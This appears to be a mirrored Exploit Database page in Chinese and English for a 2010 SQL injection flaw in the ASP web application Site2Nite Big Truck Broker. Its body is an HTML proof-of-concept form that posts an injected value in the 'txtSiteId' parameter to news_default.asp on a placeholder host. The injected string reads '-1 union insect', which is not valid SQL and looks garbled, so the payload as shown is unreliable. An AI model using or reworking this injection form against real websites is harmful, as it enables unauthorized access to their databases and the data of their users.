Site2Nite Big Truck Broker – ‘txtSiteId’ SQL Injection

• Exploit Database
• 9 阅读

• 作者： underground-stockholm.com
  日期： 2010-11-28
• 类别：

  • webapps
  平台：

  • asp
• 来源：https://www.exploit-db.com/exploits/15627/

• <!--
  Site2Nite Big Truck Broker "txtSiteId" SQL Injection Vulnerability
  PRODUCT: Site2Nite Big Truck Broker
  PRODUCT URL: http://www.site2nite.com/productdetail.asp?id=14
  RESEARCHERS: underground-stockholm.com
  RESEARCHERS URL: http://underground-stockholm.com/
  -->
  <html>
  <body>
  <form method="post" action="http://[host]/[path]/news_default.asp">
  <input type="text" name="txtSiteId" value="-1 union insect">
  <input type="hidden" name="cmdSearchId" value="Go">
  <input type="submit">
  </form>
  </body>
  </html>